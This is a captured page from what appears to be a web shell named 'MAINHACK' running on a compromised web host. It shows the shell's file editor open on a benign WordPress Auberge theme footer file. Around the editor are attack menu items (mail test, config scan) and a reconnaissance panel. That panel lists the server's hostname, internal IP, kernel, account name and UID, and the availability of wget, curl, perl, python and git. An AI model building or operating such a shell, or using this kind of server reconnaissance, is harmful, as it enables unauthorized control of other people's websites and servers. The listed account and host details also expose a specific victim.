[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: footer-credits.php
<?php /** * Theme credits * * It is completely optional, but if you like this WordPress theme, * I would appreciate it if you keep the credit link in the footer. * * @package Auberge * @copyright WebMan Design, Oliver Juhas * * @since 2.0 * @version 2.7.2 */ /** * Helper variables */ $custom_credits = trim( (string) apply_filters( 'wmhook_wm_credits_output', '' ) ); /** * Requirements check */ if ( '-' === $custom_credits ) { return; } ?> <div class="site-footer-area footer-area-site-info"> <div class="site-info-container"> <div class="site-info" role="contentinfo"> <?php if ( empty( $custom_credits ) ) : ?> © <?php echo date( 'Y' ); ?> <a href="<?php echo esc_url( home_url( '/' ) ); ?>"><?php bloginfo( 'name' ); ?></a> <span class="sep"> | </span> <?php printf( esc_html_x( 'Using %1$s %2$s theme.', '1: theme name, 2: linked "WordPress" word.', 'auberge' ), '<a rel="nofollow" href="' . esc_url( wp_get_theme( get_template() )->get( 'ThemeURI' ) ) . '"><strong>' . wp_get_theme( get_template() )->get( 'Name' ) . '</strong></a>', '<a rel="nofollow" href="' . esc_url( __( 'https://wordpress.org/', 'auberge' ) ) . '">WordPress</a>' ); if ( function_exists( 'the_privacy_policy_link' ) ) { the_privacy_policy_link( '<span class="sep"> | </span>' ); } ?> <span class="sep"> | </span> <a href="#top" id="back-to-top" class="back-to-top"><?php esc_html_e( 'Back to top ↑', 'auberge' ); ?></a> <?php else : ?> <?php // This is already validated/sanitized when stored in customizer (with wp_kses_post()). echo $custom_credits; // WPCS: XSS OK. ?> <?php endif; ?> </div> <?php get_template_part( 'template-parts/menu', 'social' ); ?> </div> </div>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm010.cluster103.gra.hosting.ovh.net
Server IP: 10.103.20.10
PHP Version: 7.4.33
Server Software: Apache
System: Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: cuisinesj
User ID (UID): 17129
Group ID (GID): 100
Script Owner UID: 17129
Current Dir Owner: 17129